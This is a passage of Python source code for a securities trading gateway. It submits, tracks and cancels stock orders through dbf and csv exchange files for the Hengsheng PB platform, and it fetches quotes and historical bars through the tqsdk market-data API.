direction = DIRECTION_STOCK_NAME2VT.get(str(data.wtfx).strip())
offset = Offset.NONE
if direction is None:
direction = Direction.NET
elif direction == Direction.LONG:
offset = Offset.OPEN
elif direction == Direction.SHORT:
offset = Offset.CLOSE
if order_status == Status.ALLTRADED:
traded = data.wtsl
else:
traded = 0
order_dt = datetime.strptime(f'{data.wtrq} {data.wtsj}', "%Y%m%d %H%M%S")
exchange = EXCHANGE_PB2VT.get(str(data.jysc).strip())
new_order = OrderData(
gateway_name=self.gateway_name,
symbol=str(data.zqdm).strip(),
exchange=exchange,
orderid=local_orderid,
sys_orderid=sys_orderid,
accountid=self.userid,
type=ORDERTYPE_PB2VT.get(str(data.wtjglx).strip(), OrderType.LIMIT),
direction=direction,
offset=offset,
price=float(data.wtjg),
volume=float(data.wtsl),
traded=traded,
status=order_status,
datetime=order_dt,
time=order_dt.strftime('%H:%M:%S')
)
self.gateway.write_log(f'补充委托记录:{print_dict(new_order.__dict__)}')
self.gateway.order_manager.on_order(new_order)
continue
if order.sys_orderid != sys_orderid:
pre_sys_orderid = order.sys_orderid
order.sys_orderid = sys_orderid
self.gateway.order_manager.update_orderid_map(local_orderid=local_orderid, sys_orderid=sys_orderid)
self.gateway.write_log(
f'绑定local_orderid:{local_orderid}, <=> 系统委托号:{pre_sys_orderid}=>{sys_orderid}')
if local_orderid in self.unchecked_orderids:
self.unchecked_orderids.remove(local_orderid)
# 如果委托状态是已经撤单,拒单,已成交,就不处理
if order.status in [Status.CANCELLED, Status.REJECTED, Status.ALLTRADED]:
continue
if order.status != order_status:
self.gateway.write_log(f'{local_orderid} 状态:{order.status.value} => {order_status.value}')
order.status = order_status
if order.status == Status.CANCELLED:
order.cancel_time = datetime.now().strftime('%H:%M:%S')
if order.status == Status.ALLTRADED and order.traded != order.volume:
self.gateway.write_log(f'dbf批量下单,委托单全成交,成交数:{order.traded}=>{order.volume}')
order.traded = order.volume
self.gateway.write_log(f'dbf批量下单,委托单更新:{order.__dict__}')
self.gateway.order_manager.on_order(order)
continue
table.close()
except Exception as ex:
self.gateway.write_error(f'dbf查询委托库异常:{str(ex)}')
self.gateway.write_error(traceback.format_exc())
def query_update_orders_csv(self):
"""扫描批量下单的委托查询(csv文件格式)"""
# XHPT_WTCX委托的CSV文件
orders_csv = os.path.abspath(os.path.join(self.order_folder,
'{}{}.csv'.format(
PB_FILE_NAMES.get('update_orders'),
self.trading_date)))
# csv => 所有委托记录
order_list = self.get_data(orders_csv, field_names=UPDATE_ORDER_FIELDS.keys())
if not order_list:
return
for data in order_list:
# 第三方系统自定义号
local_orderid = str(data["WBZDYXH"]).lstrip()
if len(local_orderid) == 0:
continue
if len(local_orderid) < 8:
local_orderid = local_orderid.rjust(8, '0')
order = self.gateway.order_manager.get_order_with_local_orderid(local_orderid)
if order is None:
continue
# 恒生平台返回的委托序号
sys_orderid = str(data['WTXH']).lstrip()
if len(sys_orderid) == 0:
continue
if order.sys_orderid != sys_orderid:
pre_sys_orderid = order.sys_orderid
order.sys_orderid = sys_orderid
self.gateway.order_manager.update_orderid_map(local_orderid=local_orderid, sys_orderid=sys_orderid)
self.gateway.write_log(f'绑定local_orderid:{local_orderid}, <=> 系统委托号:{pre_sys_orderid}=>{sys_orderid}')
if local_orderid in self.unchecked_orderids:
self.unchecked_orderids.remove(local_orderid)
# 如果委托状态是已经撤单,拒单,已成交,就不处理
if order.status in [Status.CANCELLED, Status.REJECTED, Status.ALLTRADED]:
continue
order_status = STATUS_PB2VT.get(data["WTZT"])
if order.status != order_status:
self.gateway.write_log(f'{local_orderid} 状态:{order.status.value} => {order_status.value}')
order.status = order_status
if order.status == Status.CANCELLED:
order.cancel_time = datetime.now().strftime('%H:%M:%S')
if order.status == Status.ALLTRADED and order.traded != order.volume:
self.gateway.write_log(f'csv批量下单,委托单全成交,成交数:{order.traded}=>{order.volume}')
order.traded = order.volume
self.gateway.write_log(f'csv批量下单,委托更新:{order.__dict__}')
self.gateway.order_manager.on_order(order)
continue
def query_trades(self):
if self.gateway.file_type == 'dbf':
self.query_trades_dbf()
else:
self.query_trades_csv()
def query_trades_dbf(self):
"""dbf文件获取所有成交"""
# fields:['zqgs', 'zjzh', 'zhlx', 'cpbh', 'cpmc', 'dybh', 'dymc', 'cjxh', 'wtph', 'wtxh', 'zqdm', 'zqmc', 'wtfx', 'zqlb', 'ywfl', 'cjrq', 'cjsj', 'cjsl'
# , 'cjjg', 'zfy', 'cjje', 'jysc', 'jybz', 'wtly', 'rybh', 'rymc']
trades_dbf = os.path.abspath(os.path.join(self.account_folder,
'{}{}.dbf'.format(
PB_FILE_NAMES.get('trades'),
self.trading_date)))
try:
# dbf => 股票成交信息
self.gateway.write_log(f'扫描股票成交信息:{trades_dbf}')
table = dbf.Table(trades_dbf, codepage='cp936')
table.open(dbf.READ_ONLY)
for data in table:
if str(data.zjzh).strip()!= self.userid: # ["资金账户"]
continue
sys_orderid = str(data.wtxh) # ["委托序号"]
sys_tradeid = str(data.cjxh) # ["成交序号"]
# 检查是否存在本地trades缓存中
trade = self.trades.get(sys_tradeid, None)
order = self.gateway.order_manager.get_order_with_sys_orderid(sys_orderid)
# 如果交易不再本地映射关系
if trade is None and order is None:
trade_date = str(data.cjrq).strip() #["成交日期"]
trade_time = str(data.cjsj).strip() #["成交时间"]
trade_dt = datetime.strptime(f'{trade_date} {trade_time}', "%Y%m%d %H%M%S")
direction = DIRECTION_STOCK_NAME2VT.get(str(data.wtfx).strip()) # ["委托方向"]
offset = Offset.NONE
if direction is None:
direction = Direction.NET
elif direction == Direction.LONG:
offset = Offset.OPEN
elif direction == Direction.SHORT:
offset = Offset.CLOSE
trade = TradeData(
gateway_name=self.gateway_name,
symbol=str(data.zqdm).strip(), # ["证券代码"]
exchange=EXCHANGE_NAME2VT.get(str(data.jysc).strip()), # ["交易市场"]
orderid=sys_tradeid,
tradeid=sys_tradeid,
sys_orderid=sys_orderid,
accountid=self.userid,
direction=direction,
offset=offset,
price=float(data.cjjg), # ["成交价格"]
volume=float(data.cjsl), # ["成交数量"]
datetime=trade_dt,
time=trade_dt.strftime('%H:%M:%S'),
trade_amount=float(data.cjje), # ["成交金额"]
commission=float(data.zfy) # ["总费用"]
)
self.trades[sys_tradeid] = trade
self.gateway.on_trade(copy.copy(trade))
continue
table.close()
except Exception as ex:
self.gateway.write_error(f'dbf扫描股票成交异常:{str(ex)}')
self.gateway.write_error(traceback.format_exc())
def query_trades_csv(self):
"""获取所有成交"""
# 所有成交的文件
if self.gateway.pb_version == '2018':
trades_csv = os.path.abspath(os.path.join(self.account_folder,
'{}{}.csv'.format(
PB_FILE_NAMES.get('trades'),
self.trading_date)))
else:
trades_csv = os.path.abspath(os.path.join(self.account_folder,
self.trading_date,
'{}{}.csv'.format(
PB_FILE_NAMES.get('trades'),
self.trading_date)))
# csv => 所有成交记录
trade_list = self.get_data(trades_csv)
if not trade_list:
return
for data in trade_list:
if data["资金账户"] != self.userid:
continue
sys_orderid = str(data["委托序号"])
sys_tradeid = str(data["成交序号"])
# 检查是否存在本地trades缓存中
trade = self.trades.get(sys_tradeid, None)
order = self.gateway.order_manager.get_order_with_sys_orderid(sys_orderid)
# 如果交易不再本地映射关系
if trade is None and order is None:
trade_date = data["成交日期"]
trade_time = data["成交时间"]
trade_dt = datetime.strptime(f'{trade_date} {trade_time}', "%Y%m%d %H%M%S")
direction = DIRECTION_STOCK_NAME2VT.get(data["委托方向"])
offset = Offset.NONE
if direction is None:
direction = Direction.NET
elif direction == Direction.LONG:
offset = Offset.OPEN
elif direction == Direction.SHORT:
offset = Offset.CLOSE
trade = TradeData(
gateway_name=self.gateway_name,
symbol=data["证券代码"],
exchange=EXCHANGE_NAME2VT.get(data["交易市场"]),
orderid=sys_tradeid,
tradeid=sys_tradeid,
sys_orderid=sys_orderid,
accountid=self.userid,
direction=direction,
offset=offset,
price=float(data["成交价格"]),
volume=float(data["成交数量"]),
datetime=trade_dt,
time=trade_dt.strftime('%H:%M:%S'),
trade_amount=float(data["成交金额"]),
commission=float(data["总费用"])
)
self.trades[sys_tradeid] = trade
self.gateway.on_trade(copy.copy(trade))
continue
def query_update_trades_dbf(self):
"""获取接口的dbf成交更新"""
# 所有成交的dbf文件
trades_dbf = os.path.abspath(os.path.join(self.order_folder,
'{}{}.dbf'.format(
PB_FILE_NAMES.get('update_trades'),
self.trading_date)))
try:
# dbf => 所有成交记录
self.gateway.write_log(f'扫描所有成交记录:{trades_dbf}')
table = dbf.Table(trades_dbf, codepage='cp936')
table.open(dbf.READ_ONLY)
for data in table:
# 本地委托号
local_orderid = str(data.wbzdyxh).strip()
if 0 < len(local_orderid) < 8:
local_orderid = local_orderid.rjust(8, '0')
# 系统委托号
sys_orderid = str(data.wtxh).strip()
# 系统交易号
sys_tradeid = str(data.cjbh).strip()
# 检查是否存在本地trades缓存中
trade = self.trades.get(sys_tradeid, None)
order = self.gateway.order_manager.get_order_with_sys_orderid(sys_orderid)
# 如果交易不再本地映射关系
if trade is None and order:
trade_date = str(data.cjrq).strip()
trade_time = str(data.cjsj).strip()
trade_dt = datetime.strptime(f'{trade_date} {trade_time}', "%Y%m%d %H%M%S")
direction = DIRECTION_ORDER_PB2VT.get(str(data.wtfx).strip())
offset = Offset.NONE
if direction is None:
direction = Direction.NET
elif direction == Direction.LONG:
offset = Offset.OPEN
elif direction == Direction.SHORT:
offset = Offset.CLOSE
trade = TradeData(
gateway_name=self.gateway_name,
symbol=str(data.zqdm).strip(),
exchange=EXCHANGE_PB2VT.get(str(data.jysc).strip()),
orderid=local_orderid,
tradeid=sys_tradeid,
sys_orderid=sys_orderid,
accountid=self.userid,
direction=direction,
offset=offset,
price=float(data.cjjg),
volume=int(data.cjsl),
datetime=trade_dt,
time=trade_dt.strftime('%H:%M:%S'),
trade_amount=float(data.cjje),
commission=float(data.zfy),
holder_id=str(data.gddm).strip()
)
# 保存交易记录
self.trades[sys_tradeid] = trade
# 更新订单的成交数量
if order.volume >= order.traded + trade.volume:
pre_traded = order.traded
order.traded += trade.volume
self.gateway.write_log(
f'{local_orderid}/{sys_orderid} 成交数量:{pre_traded} =>{order.traded} ,目标:{order.volume}')
# 发送成交更新
self.gateway.on_trade(copy.copy(trade))
continue
table.close()
except Exception as ex:
self.gateway.write_error(f'dbf查询成交库异常:{str(ex)}')
self.gateway.write_error(traceback.format_exc())
def query_update_trades_csv(self):
"""获取接口的csv成交更新"""
# 所有成交的csv文件
trades_csv = os.path.abspath(os.path.join(self.order_folder,
'{}{}.csv'.format(
PB_FILE_NAMES.get('update_trades'),
self.trading_date)))
# csv => 所有成交记录
trade_list = self.get_data(trades_csv, field_names=UPDATE_TRADE_FIELDS.keys())
if not trade_list:
return
for data in trade_list:
local_orderid = str(data["WBZDYXH"]).lstrip()
if len(local_orderid) < 8:
local_orderid = local_orderid.rjust(8, '0')
sys_orderid = str(data["WTXH"]).lstrip()
sys_tradeid = str(data["CJBH"]).lstrip()
# 检查是否存在本地trades缓存中
trade = self.trades.get(sys_tradeid, None)
order = self.gateway.order_manager.get_order_with_sys_orderid(sys_orderid)
# 如果交易不再本地映射关系
if trade is None and order:
trade_date = str(data["CJRQ"]).lstrip()
trade_time = str(data["CJSJ"]).lstrip()
trade_dt = datetime.strptime(f'{trade_date} {trade_time}', "%Y%m%d %H%M%S")
direction = DIRECTION_ORDER_PB2VT.get(str(data.wtfx).strip())
offset = Offset.NONE
if direction is None:
direction = Direction.NET
elif direction == Direction.LONG:
offset = Offset.OPEN
elif direction == Direction.SHORT:
offset = Offset.CLOSE
trade = TradeData(
gateway_name=self.gateway_name,
symbol=str(data["ZQDM"]).lstrip(),
exchange=EXCHANGE_PB2VT.get(str(data["JYSC"]).lstrip()),
orderid=local_orderid,
tradeid=sys_tradeid,
sys_orderid=sys_orderid,
accountid=self.userid,
direction=direction,
offset=offset,
price=float(str(data["CJJG"]).lstrip()),
volume=float(str(data["CJSL"]).lstrip()),
datetime=trade_dt,
time=trade_dt.strftime('%H:%M:%S'),
trade_amount=float(str(data["CJJE"]).lstrip()),
commission=float(str(data["ZFY"]).lstrip()),
holder_id=str(data['GDDM']).lstrip()
)
# 保存交易记录
self.trades[sys_tradeid] = trade
# 更新订单的成交数量
if order.volume >= order.traded + trade.volume:
pre_traded = order.traded
order.traded += trade.volume
self.gateway.write_log(
f'{local_orderid}/{sys_orderid} 成交数量:{pre_traded} =>{order.traded} ,目标:{order.volume}')
# 发送成交更新
self.gateway.on_trade(copy.copy(trade))
continue
def check_send_order_dbf(self):
"""检查更新委托文件dbf"""
dbf_file = os.path.abspath(os.path.join(self.order_folder,
'{}{}.dbf'.format(PB_FILE_NAMES.get('send_order'), self.trading_date)))
try:
table = dbf.Table(dbf_file, codepage='cp936')
table.open(dbf.READ_ONLY)
for record in table:
local_orderid = str(record.wbzdyxh)
if len(local_orderid) < 8:
local_orderid = local_orderid.rjust(8, '0')
if local_orderid not in self.unchecked_orderids:
continue
# 从本地order_manager中获取order
order = self.gateway.order_manager.get_order_with_local_orderid(local_orderid)
# 判断order取不到,或者order状态不是SUBMITTING
if order is None or order.status != Status.SUBMITTING:
continue
# 检查是否具有系统委托编号
if order.sys_orderid == "":
sys_orderid = str(getattr(record, 'wtxh', ''))
if len(sys_orderid) == 0:
continue
# 委托失败标志
if sys_orderid == "0":
err_msg = record.sbyy
if isinstance(err_msg, bytes):
err_msg = err_msg.decode('gbk')
if len(err_msg) == 0 or record.wtsbdm == 0:
self.gateway.write_log(f'收到失败,又没有失败原因')
continue
err_id = str(getattr(record, 'wtsbdm', '')).strip()
order.status = Status.REJECTED
self.gateway.write_log(f'dbf批量下单,委托被拒:{order.__dict__}')
self.gateway.order_manager.on_order(order)
self.gateway.write_error(msg=f'{order.direction.value},{order.vt_symbol},{err_msg}',
error={"ErrorID": err_id, "ErrorMsg": "委托失败"})
if sys_orderid != '0':
self.gateway.order_manager.update_orderid_map(local_orderid=local_orderid,
sys_orderid=sys_orderid)
order.sys_orderid = sys_orderid
order.status = Status.NOTTRADED
self.gateway.write_log(f'绑定本地local_orderid:{local_orderid} <=>sys_orderid:{sys_orderid}')
self.gateway.write_log(f'dbf批量下单,委托接受:{order.__dict__}')
self.gateway.order_manager.on_order(order)
self.gateway.write_log(f'委托成功')
# 移除检查的id
self.gateway.write_log(f'本地委托单更新检查完毕,移除{local_orderid}')
self.unchecked_orderids.remove(local_orderid)
table.close()
except Exception as ex:
self.gateway.write_error(f'dbf查询系统委托号异常:{str(ex)}')
self.gateway.write_error(traceback.format_exc())
def check_send_order_csv(self):
"""检查更新委托文件csv"""
# 当日send_order的文件
send_order_csv = os.path.abspath(os.path.join(self.order_folder,
'{}{}.csv'.format(
PB_FILE_NAMES.get('send_order'),
self.trading_date)))
# csv => 所有send_order记录
order_list = self.get_data(send_order_csv, field_names=SEND_ORDER_FIELDS.keys())
# 逐一处理
for data in order_list:
local_orderid = data.get('WBZDYXH', "").lstrip(' ')
if local_orderid is "":
continue
if local_orderid not in self.unchecked_orderids:
continue
# 从本地order_manager中获取order
order = self.gateway.order_manager.get_order_with_local_orderid(local_orderid)
# 判断order取不到,或者order状态不是SUBMITTING
if order is None or order.status != Status.SUBMITTING:
continue
# 检查是否具有系统委托编号
if order.sys_orderid == "":
sys_orderid = data.get('WTXH', '').lstrip(' ')
if len(sys_orderid) == 0:
continue
err_msg = data.get('SBYY', '').lstrip(' ')
# 委托失败标志
if sys_orderid == "0":
if len(err_msg) == 0:
self.gateway.write_log(f'收到失败标准,又没有失败原因:{print_dict(data.__dict__)}')
continue
err_id = data.get('WTSBDM', '').lstrip(' ')
order.status = Status.REJECTED
self.gateway.write_log(f'csv批量下单,委托被拒:{order.__dict__}')
self.gateway.order_manager.on_order(order)
self.gateway.write_error(msg=err_msg, error={"ErrorID": err_id, "ErrorMsg": "委托失败"})
if sys_orderid != '0':
self.gateway.order_manager.update_orderid_map(local_orderid=local_orderid, sys_orderid=sys_orderid)
order.sys_orderid = sys_orderid
order.status = Status.NOTTRADED
self.gateway.write_log(f'csv批量下单,委托被接受:{order.__dict__}')
self.gateway.order_manager.on_order(order)
self.gateway.write_log(f'委托成功')
# 移除检查的id
self.gateway.write_log(f'本地委托单更新检查完毕,移除{local_orderid}')
self.unchecked_orderids.remove(local_orderid)
def send_order(self, req: OrderRequest):
"""委托发单"""
self.gateway.write_log(f'委托发单:{req.__dict__}')
if self.gateway.file_type == 'dbf':
return self.send_order_dbf(req)
else:
return self.send_order_csv(req)
def send_order_dbf(self, req: OrderRequest):
"""通过dbf文件进行发单"""
# 发生委托,才添加批量埋单接口的委托、成交检查
if self.query_update_trades_dbf not in self.gateway.query_functions:
self.gateway.query_functions.append(self.query_update_trades_dbf)
if self.query_update_orders_dbf not in self.gateway.query_functions:
self.gateway.query_functions.append(self.query_update_orders_dbf)
# 创建本地orderid(str格式, HHMM+00序列号)
local_orderid = self.gateway.order_manager.new_local_orderid()
# req => order
order = req.create_order_data(orderid=local_orderid, gateway_name=self.gateway_name)
dbf_file = os.path.abspath(os.path.join(self.order_folder,
'{}{}.dbf'.format(PB_FILE_NAMES.get('send_order'), self.trading_date)))
# 股票买卖,强制offset = Offset.NONE
order.offset = Offset.NONE
contract = self.gateway.md_api.contract_dict.get(f'{order.symbol}.{order.exchange.value}')
direction = DIRECTION_STOCK_VT2PB.get((order.direction, order.offset)) # 委托方向
if contract:
if contract.product == Product.BOND:
if direction == '1':
direction = '3'
else:
direction = '4'
data = (
self.product_id, # "CPBH": "C32", # 产品代码/基金代码 <-- 输入参数 -->
self.unit_id, # "ZCDYBH": "C16", # 单元编号/组合编号
self.unit_id, # "ZHBH": "C16", # 组合编号
self.holder_ids.get(order.exchange), # "GDDM": "C20", # 股东代码
EXCHANGE_VT2PB.get(order.exchange), # "JYSC": "C3", # 交易市场
order.symbol, # "ZQDM": "C16", # 证券代码
direction, # "WTFX": "C4", # 委托方向
get_pb_order_type(order.exchange, order.type), # "WTJGLX": "C1", # 委托价格类型
round(order.price, 2), # "WTJG": "N11.4", # 委托价格
int(order.volume), # "WTSL": "N12", # 委托数量
local_orderid, # "WBZDYXH": "N9", # 第三方系统自定义号( 如果字符串不是数字,会报错,如果前面有0,自动去掉)
None, # "WTXH": "N8", # 委托序号 <-- 输出参数 -->
None, # "WTSBDM": "N8", # 委托失败代码
"", # "SBYY": "C254", # 失败原因
"", # "CLBZ": "C1", # 处理标志 <-- 内部自用字段 -->
"", # "BYZD": "C2", # 备用字段
0, # "WTJE": "N16.2", # 委托金额 <-- 扩充参数 -->
"", # "TSBS": "C64", # 特殊标识
"" # "YWBS": "C2", # 业务标识
)
try:
# 打开dbf文件=》table
table = dbf.Table(dbf_file)
# 读取、写入模式
table.open(dbf.READ_WRITE)
# 写入数据
table.append(data)
# 关闭dbf文件
table.close()
except Exception as ex:
self.gateway.write_error(f'dbf添加发单记录异常:{str(ex)}')
self.gateway.write_error(traceback.format_exc())
return ""
# 设置状态为提交中
order.status = Status.SUBMITTING
# 添加待检查列表
self.unchecked_orderids.append(local_orderid)
# 登记并发送on_order事件
self.gateway.write_log(f'send_order,提交dbf委托:{order.__dict__}')
self.gateway.order_manager.on_order(order)
# 添加定时检查任务
if self.check_send_order_dbf not in self.gateway.query_functions:
self.gateway.write_log(f'添加扫描系统委托号任务到任务队列中')
self.gateway.query_functions.append(self.check_send_order_dbf)
return order.vt_orderid
def send_order_csv(self, req: OrderRequest):
"""csv文件格式委托"""
# 发生委托,才添加批量埋单接口的委托、成交检查
if self.query_update_trades_csv not in self.gateway.query_functions:
self.gateway.query_functions.append(self.query_update_trades_csv)
if self.query_update_orders_csv not in self.gateway.query_functions:
self.gateway.query_functions.append(self.query_update_orders_csv)
# 创建本地orderid
local_orderid = self.gateway.order_manager.new_local_orderid()
# req => order
order = req.create_order_data(orderid=local_orderid, gateway_name=self.gateway_name)
csv_file = os.path.abspath(os.path.join(self.order_folder,
'{}{}.csv'.format(PB_FILE_NAMES.get('send_order'), self.trading_date)))
# 股票买卖,强制offset = Offset.NONE
order.offset = Offset.NONE
contract = self.gateway.md_api.contract_dict.get(f'{order.symbol}.{order.exchange.value}')
direction = DIRECTION_STOCK_VT2PB.get((order.direction, order.offset)) # 委托方向
if contract:
if contract.product == Product.BOND:
if direction == '1':
direction = '3'
else:
direction = '4'
data = {
"CPBH": self.product_id, # 产品代码/基金代码 <-- 输入参数 -->
"ZCDYBH": self.unit_id, # 单元编号/组合编号
"ZHBH": self.unit_id, # 组合编号
"GDDM": self.holder_ids.get(order.exchange), # 股东代码
"JYSC": EXCHANGE_VT2PB.get(order.exchange), # 交易市场
"ZQDM": order.symbol, # 证券代码
"WTFX": direction,
"WTJGLX": get_pb_order_type(order.exchange, order.type), # 委托价格类型
"WTJG": round(order.price, 4), # 委托价格
"WTSL": int(order.volume), # 委托数量
"WBZDYXH": local_orderid # 第三方系统自定义号
}
# 更新所有字段得长度
order_data = format_dict(data, SEND_ORDER_FIELDS)
append_data(file_name=csv_file,
dict_data=order_data,
field_names=list(SEND_ORDER_FIELDS.keys()),
auto_header=False,
encoding='gbk')
# 设置状态为提交中
order.status = Status.SUBMITTING
# 添加待检查列表
self.unchecked_orderids.append(local_orderid)
# 登记并发送on_order事件
self.gateway.write_log(f'send_order,提交csv下单:{order.__dict__}')
self.gateway.order_manager.on_order(order)
# 添加定时检查任务
if self.check_send_order_csv not in self.gateway.query_functions:
self.gateway.write_log(f'添加定时检查到任务队列中')
self.gateway.query_functions.append(self.check_send_order_csv)
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
if self.gateway.file_type == 'dbf':
return self.cancel_order_dbf(req)
else:
return self.cancel_order_csv(req)
def cancel_order_dbf(self, req: CancelRequest):
"""
dbf文件撤单
:param req:
:return:
"""
self.gateway.write_log(f'dbf委托撤单:{req.__dict__}')
try:
# 获取订单
order = self.gateway.order_manager.get_order_with_local_orderid(local_orderid=req.orderid)
# 订单不存在
if order is None:
self.gateway.write_error(f'订单{req.orderid}不存在, 撤单失败')
return False
# 或者已经全部成交,已经被拒单,已经撤单
if order.status in [Status.ALLTRADED, Status.REJECTED, Status.CANCELLING,
Status.CANCELLED]:
self.gateway.write_error(f'订单{req.orderid}存在, 状态为:{order.status}, 不能再撤单')
return False
sys_orderid = self.gateway.order_manager.get_sys_orderid(req.orderid)
if sys_orderid is None or len(sys_orderid) == 0:
self.gateway.write_error(f'订单{req.orderid}=》系统委托id不存在,撤单失败')
return False
data = (
int(sys_orderid), # 委托序号
None, # "JYSC": "C3", # 交易市场
None, # "ZQDM": "C16", # 证券代码
None, # "CDCGBZ": "C1", # 撤单成功标志
None, # "SBYY": "C254", # 失败原因
None, # "CLBZ": "C1", # 处理标志
None, # "BYZD": "C2", # 备用字段
None # "BYZD2": "C16", # 备用字段2
)
dbf_file = os.path.abspath(os.path.join(self.order_folder,
'{}{}.dbf'.format(PB_FILE_NAMES.get('cancel_order'),
self.trading_date)))
# 打开dbf文件=》table
table = dbf.Table(dbf_file)
# 读取、写入模式
table.open(dbf.READ_WRITE)
# 写入数据
table.append(data)
# 关闭dbf文件
table.close()
return True
except Exception as ex:
self.gateway.write_error(f'dbf委托撤单异常:{str(ex)}')
self.gateway.write_error(traceback.format_exc())
return False
def cancel_order_csv(self, req: CancelRequest):
"""csv文件撤单"""
self.gateway.write_log(f'处理撤单请求{req.__dict__}')
# 获取订单
order = self.gateway.order_manager.get_order_with_local_orderid(local_orderid=req.orderid)
# 订单不存在
if order is None:
self.gateway.write_log(f'订单{req.orderid}不存在, 撤单失败')
return False
# 或者已经全部成交,已经被拒单,已经撤单
if order.status in [Status.ALLTRADED, Status.REJECTED, Status.CANCELLING,
Status.CANCELLED]:
self.gateway.write_log(f'订单{req.orderid}存在, 状态为:{order.status}, 不能再撤单')
return False
sys_orderid = self.gateway.order_manager.get_sys_orderid(req.orderid)
if len(sys_orderid) == 0:
self.gateway.write_log(f'订单{req.orderid}=》系统委托id不存在,撤单失败')
return False
data = {
"WTXH": sys_orderid, # 委托序号
}
# 更新所有字段得长度
cancel_data = format_dict(data, CANCEL_ORDER_FIELDS)
csv_file = os.path.abspath(os.path.join(self.order_folder,
'{}{}.csv'.format(PB_FILE_NAMES.get('cancel_order'),
self.trading_date)))
append_data(file_name=csv_file,
dict_data=cancel_data,
field_names=list(CANCEL_ORDER_FIELDS.keys()),
auto_header=False,
encoding='gbk')
return True
def cancel_all(self):
if self.gateway.file_type == 'dbf':
return self.cancel_all_dbf()
else:
return self.cancel_all_csv()
def cancel_all_dbf(self):
"""dbf文件全策略单d"""
# XHPT_WTCX委托的dbf文件
orders_dbf = os.path.abspath(os.path.join(self.order_folder,
'{}{}.dbf'.format(
PB_FILE_NAMES.get('update_orders'),
self.trading_date)))
cancel_dbf = os.path.abspath(os.path.join(self.order_folder,
'{}{}.dbf'.format(PB_FILE_NAMES.get('cancel_order'),
self.trading_date)))
# dbf => 所有委托记录
try:
# dbf => 所有成交记录
self.gateway.write_log(f'全撤单,扫描所有委托查询记录:{orders_dbf}')
orders_table = dbf.Table(orders_dbf, codepage='cp936')
orders_table.open(dbf.READ_ONLY)
cancel_table = dbf.Table(cancel_dbf, codepage='cp936')
cancel_table.open(dbf.READ_WRITE)
for data in orders_table:
# 委托状态=>
order_status = STATUS_PB2VT.get(str(data.wtzt))
# 恒生平台返回的委托序号
sys_orderid = str(data.wtxh)
if order_status in [Status.NOTTRADED] and len(sys_orderid) > 0:
self.gateway.write_log(f'撤单:{data.wtxh}')
cancel_data = (int(sys_orderid), None, None, None, None, None, None, None)
cancel_table.append(cancel_data)
orders_table.close()
cancel_table.close()
except Exception as ex:
self.gateway.write_error(f'dbf全委托撤单异常:{str(ex)}')
self.gateway.write_error(traceback.format_exc())
return False
def cancel_all_csv(self):
pass
class TqMdApi():
"""天勤行情API"""
def __init__(self, gateway):
""""""
super().__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.api = None
self.is_connected = False
self.subscribe_array = []
# 行情对象列表
self.quote_objs = []
# 数据更新线程
self.update_thread = None
# 所有的合约
self.all_instruments = []
self.ticks = {}
def connect(self, setting={}):
""""""
if self.api and self.is_connected:
self.gateway.write_log(f'天勤行情已经接入,无需重新连接')
return
try:
from tqsdk import TqApi
self.api = TqApi(_stock=True, url="wss://api.shinnytech.com/t/nfmd/front/mobile")
except Exception as e:
self.gateway.write_log(f'天勤股票行情API接入异常:'.format(str(e)))
self.gateway.write_log(traceback.format_exc())
if self.api:
self.is_connected = True
self.gateway.write_log(f'天勤股票行情API已连接')
self.update_thread = Thread(target=self.update)
self.update_thread.start()
def generate_tick_from_quote(self, vt_symbol, quote) -> TickData:
"""
生成TickData
"""
# 清洗 nan
quote = {k: 0 if v != v else v for k, v in quote.items()}
symbol, exchange = extract_vt_symbol(vt_symbol)
return TickData(
symbol=symbol,
exchange=exchange,
datetime=datetime.strptime(quote["datetime"], "%Y-%m-%d %H:%M:%S.%f"),
name=symbol,
volume=quote["volume"],
open_interest=quote["open_interest"],
last_price=quote["last_price"],
limit_up=quote["upper_limit"],
limit_down=quote["lower_limit"],
open_price=quote["open"],
high_price=quote["highest"],
low_price=quote["lowest"],
pre_close=quote["pre_close"],
bid_price_1=quote["bid_price1"],
bid_price_2=quote["bid_price2"],
bid_price_3=quote["bid_price3"],
bid_price_4=quote["bid_price4"],
bid_price_5=quote["bid_price5"],
ask_price_1=quote["ask_price1"],
ask_price_2=quote["ask_price2"],
ask_price_3=quote["ask_price3"],
ask_price_4=quote["ask_price4"],
ask_price_5=quote["ask_price5"],
bid_volume_1=quote["bid_volume1"],
bid_volume_2=quote["bid_volume2"],
bid_volume_3=quote["bid_volume3"],
bid_volume_4=quote["bid_volume4"],
bid_volume_5=quote["bid_volume5"],
ask_volume_1=quote["ask_volume1"],
ask_volume_2=quote["ask_volume2"],
ask_volume_3=quote["ask_volume3"],
ask_volume_4=quote["ask_volume4"],
ask_volume_5=quote["ask_volume5"],
gateway_name=self.gateway_name
)
def update(self) -> None:
"""
更新行情/委托/账户/持仓
"""
while self.api.wait_update():
# 更新行情信息
for vt_symbol, quote in self.quote_objs:
if self.api.is_changing(quote):
tick = self.generate_tick_from_quote(vt_symbol, quote)
tick and self.gateway.on_tick(tick) and self.gateway.on_custom_tick(tick)
def subscribe(self, req: SubscribeRequest) -> None:
"""
订阅行情
"""
if req.vt_symbol not in self.subscribe_array:
symbol, exchange = extract_vt_symbol(req.vt_symbol)
try:
quote = self.api.get_quote(f'{exchange.value}.{symbol}')
self.quote_objs.append((req.vt_symbol, quote))
self.subscribe_array.append(req.vt_symbol)
except Exception as ex:
self.gateway.write_log('订阅天勤行情异常:{}'.format(str(ex)))
def query_history(self, req: HistoryRequest) -> List[BarData]:
"""
获取历史数据
"""
symbol = req.symbol
exchange = req.exchange
interval = req.interval
start = req.start
end = req.end
# 天勤需要的数据
tq_symbol = f'{exchange.value}.{symbol}'
tq_interval = INTERVAL_VT2TQ.get(interval)
end += timedelta(1)
total_days = end - start
# 一次最多只能下载 8964 根Bar
min_length = min(8964, total_days.days * 500)
df = self.api.get_kline_serial(tq_symbol, tq_interval, min_length).sort_values(
by=["datetime"]
)
# 时间戳对齐
df["datetime"] = pd.to_datetime(df["datetime"] + TIME_GAP)
# 过滤开始结束时间
df = df[(df["datetime"] >= start - timedelta(days=1)) & (df["datetime"] < end)]
data: List[BarData] = []
if df is not None:
for ix, row in df.iterrows():
bar = BarData(
symbol=symbol,
exchange=exchange,
interval=interval,
datetime=row["datetime"].to_pydatetime(),
open_price=row["open"],
high_price=row["high"],
low_price=row["low"],
close_price=row["close"],
volume=row["volume"],
open_interest=row.get("close_oi", 0),
gateway_name=self.gateway_name,
)
data.append(bar)
return data
def close(self) -> None:
""""""
